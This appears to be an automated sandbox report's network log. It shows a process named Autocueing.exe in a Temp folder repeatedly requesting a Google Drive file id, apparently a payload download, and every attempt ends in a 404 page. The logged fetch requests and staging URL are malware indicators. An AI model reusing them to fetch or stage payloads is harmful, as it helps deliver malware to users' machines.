                                                                                                                                                                                    2025-01-11 04:28:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 37 76 4e 5a 43 5f 45 5f 79 51 5f 5a 42 39 62 47 6d 70 61 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w7vNZC_E_yQ_ZB9bGmpayg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    40192.168.2.650025142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:48 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:48 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:48 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Mo7sk0WyFmFbNbGeBICsOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    41192.168.2.650026142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:49 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:49 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgRkmIAMlVcYHpK3iY-s1TKO0mVvpYHIJDELoOBL8JBsuWXHBJbAISvxi0jw8C5Q56RO
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:49 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-G17mHrrdCPJTaSnUkjj-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 64 34 46 79 33 4d 38 76 69 6a 78 58 6a 55 4f 77 57 35 74 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Od4Fy3M8vijxXjUOwW5tzA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    42192.168.2.650027142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:50 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:51 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:50 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-xUj23TPjxuBHTjgGwAruUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    43192.168.2.650028142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:51 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:52 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTNrnN8o8l8VfOKBCFiTG82L0PDpFCMu2bqAn80o_z8fWYs32ddZh28UwI24Uy6lKVZP8soGB8
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:51 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-PWz03kX-0s5EO-LAHtJd6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 61 46 37 61 35 53 59 4a 43 30 4f 74 68 59 77 39 71 77 50 32 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="daF7a5SYJC0OthYw9qwP2Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    44192.168.2.650029142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:53 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:53 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:53 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-eL1v56B56Gctbdi5NnPdaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    45192.168.2.650030142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:53 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:54 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC76krFNKrWk2era1CLv4MbRxEgmz_nfuGCHq1RVD8g1_UWo3K6LSMp6nc3tgQK0KapK
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:54 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-wnKkzTf98lew9WJKLRDlxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 79 59 6e 73 75 42 6d 73 35 35 4b 72 66 46 37 39 59 76 78 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2yYnsuBms55KrfF79Yvx-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    46192.168.2.650031142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:55 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:55 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:55 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
